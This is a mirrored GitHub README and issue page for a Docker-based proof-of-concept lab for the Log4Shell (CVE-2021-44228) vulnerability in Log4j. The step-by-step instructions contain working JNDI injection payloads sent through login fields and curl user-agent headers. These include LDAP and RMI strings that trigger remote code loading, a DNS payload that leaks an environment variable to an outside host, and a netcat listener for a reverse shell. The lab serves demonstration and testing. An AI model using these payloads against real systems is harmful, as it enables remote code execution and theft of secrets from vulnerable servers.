Code Monkey home page Code Monkey logo

log4j-poc's Introduction

log4j-poc

An LDAP RCE exploit for CVE-2021-44228 Log4Shell

Description

The demo Tomcat 8 server on port 8080 has a vulnerable app (log4shell) deployed on it and the server also vulnerable via user-agent attacks.

The remote exploit app in this demo is based on that found at https://github.com/kozmer/log4j-shell-poc

This demo tomcat server (Tomcat 8.5.3, Java 1.8.0u51) has been reconfigued to use Log4J2 for logging - a non-standard configuration.

A newer Bitnami server is now available on port 8888. It is also is configured for Log4J2 logging and is running Tomcat 9.0.55 and OpenJDK 11.0.13.

The RMI exploit against the Tomcat 9 / Java 11 server is described here: https://www.veracode.com/blog/research/exploiting-jndi-injections-java (Jan 3, 2019) by Michael Stepankin

The detection script will check for user-agent vulnerablities and is from here: https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6

Prerequisites

This code requires Docker and Docker Compose

Installation

git clone https://github.com/cyberxml/log4j-poc
cd log4j-poc
# edit docker-compose.yml to addjust the environment variables as needed.
#   POC_ADDR is the address of the cve-poc container
#   LISTENER_ADDR is the address of the 'nc' listener e.g. the docker host
# The listener IP address is the address of the machine on which you will run the netcat 'nc' listener
# This can be the local IP of the docker hostmachine.
docker-compose build

Run Web App Attack Demo

  1. Setup your docker listener in the first terminal
    1. nc -lv 10.10.10.31 9001
  2. Start the docker containers in a second terminal
    1. docker-compose up
  3. Navigate to the web app on port 8080
    1. Navigate to http://10.10.10.31:8080/log4shell
      1. Enter the username: admin
      2. Enter the password: password
      3. Select the "login" button
      4. See the welcome screen
    2. Return to login at http://10.10.10.31:8080/log4shell
      1. Enter the username ${jndi:ldap://172.16.238.11:1389/a}
      2. Select the "login" button
      3. Check for connection on your nc listener

Run a User Agent Attack Demo

  1. Setup your docker listener in the first terminal
    1. nc -lv 10.10.10.31 9001
  2. Start the docker containers in a second terminal
    1. docker-compose up
  3. In a third terminal, run the following. The second IP is the docker host
    1. curl -A "\${jndi:ldap://172.16.238.11:1389/a}" http://10.10.10.31:8080/log4shell

Run a DNS Exfil Demo on Recent Java 11 version

  1. Start the docker containers in a terminal
    1. docker-compose up
  2. In a second terminal, run the following. The IP is the ip address of the docker host
    1. curl -A "\${jndi:dns://10.10.10.31/\${env:POC_PASSWORD}}" http://10.10.10.31:8888/log4shell/
  3. The vulnerable web server will attempt to do a TXT lookup at the given IP. See log4j-dns_exfil.pcap

Run an RMI RCE Demo on Recent Java 11 version

I am having issues with command line arg for ping target. So you have to compile yourself.

Compile

  1. Start the docker containers in a terminal
    1. docker-compose up
  2. In another terminal, Login to the cve-poc
    1. docker exec -it log4j-poc_cve-poc_1 /bin/bash
  3. Kill running RMIServerPOC instance
  4. Change to rmi-poc directory
    1. cd /home/user/rmi-poc
  5. Edit RMIServerPOC.java to change 10.10.10.31 to your ping target
  6. Recompile
    1. javac -cp catalina.jar:. RMIServerPOC.java
  7. Run the Server
    1. javac -cp catalina.jar:. RMIServerPOC 127.0.0.1

Run RMI RCE Demo

  1. Start the docker containers in a terminal
    1. docker-compose up
  2. In a second terminal, run the following. The IP is the ip address of the docker host
    1. curl -A "\${jndi:rmi://172.16.238.11:1097/Object}" http://10.10.10.31:8888/
  3. The vulnerable web server will download a serialized malicious class from the RMI server for a class which already exists in the Tomcat environment.
  4. This will ping the IP address defined in the compile section.

Detect UA Vulnerability

  1. cd scripts
  2. python3 log4j_rce_check.py http://10.10.10.31:8080/log4shell --attacker-host 10.10.10.31:11389 --timeout=2
  3. you will have to kill the process, not sure yet why this hangs

log4j-poc's People

Contributors

cyberxml avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar

log4j-poc's Issues

Must change source code "cve-poc/Dockerfile" to build this project!!

FROM codenvy/jdk8_maven3_tomcat8

COPY --chown=user:user files /

USER root

RUN apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 648ACFD622F3D138
RUN apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 0E98404D386FA1D9
RUN apt-key adv --keyserver keyserver.ubuntu.com --recv-keys DCC9EFBF77E11517

RUN echo "deb http://deb.debian.org/debian/ buster main" > /etc/apt/sources.list
RUN echo "deb-src http://deb.debian.org/debian/ buster main" >> /etc/apt/sources.list

RUN sudo apt-get -y remove binutils
RUN sudo apt-get update && sudo apt-get -y install python3 netcat vim tcpdump

USER user

WORKDIR /home/user

RUN cd rmi-poc &&
javac -cp catalina.jar:. RMIServerPOC.java

EXPOSE 22/tcp

CMD ["/entrypoint.sh"]

cve-neo: build Dockerfile http 503 Error : wget -S -c https://dlcdn.apache.org/maven/maven-3/3.8.4/binaries/apache-maven-3.8.4-bin.tar.gz

wget Error 503
wget -S -c https://dlcdn.apache.org/maven/maven-3/3.8.4/binaries/apache-maven-3.8.4-bin.tar.gz
--2022-02-06 13:45:18-- https://dlcdn.apache.org/maven/maven-3/3.8.4/binaries/apache-maven-3.8.4-bin.tar.gz
Resolving dlcdn.apache.org (dlcdn.apache.org)... 151.101.2.132, 2a04:4e42::644
Connecting to dlcdn.apache.org (dlcdn.apache.org)|151.101.2.132|:443... connected.
HTTP request sent, awaiting response...
HTTP/1.1 503 Backend unavailable, connection timeout

Solution change to downloads.apache : RUN wget https://downloads.apache.org/maven/maven-3/3.8.4/binaries/apache-maven-3.8.4-bin.tar.gz

wget call in Dockerfile should use --no-check-certificate

Dockerfile for cve-web includes a wget call to archive.apache.org. This is causing an error:

0.888 ERROR: The certificate of 'archive.apache.org' is not trusted.
0.888 ERROR: The certificate of 'archive.apache.org' hasn't got a known issuer.

To get around this, use wget --no-check-certificate https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.3/bin/apache-tomcat-8.5.3.tar.gz instead.

Missing packet capture for RMI exploit

I noticed you didn't have an example packet capture of a successful RMI exploit, so I've attached one to this issue.

The relevant data is:

  • TCP stream 0: HTTP request with malicious lookup string in the user agent header
  • TCP stream 1: RMI initialization (?)
  • TCP stream 2: Malicious serialized Java object
  • TCP stream 3: Reverse shell communication

rmi_exploit.pcap.zip

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.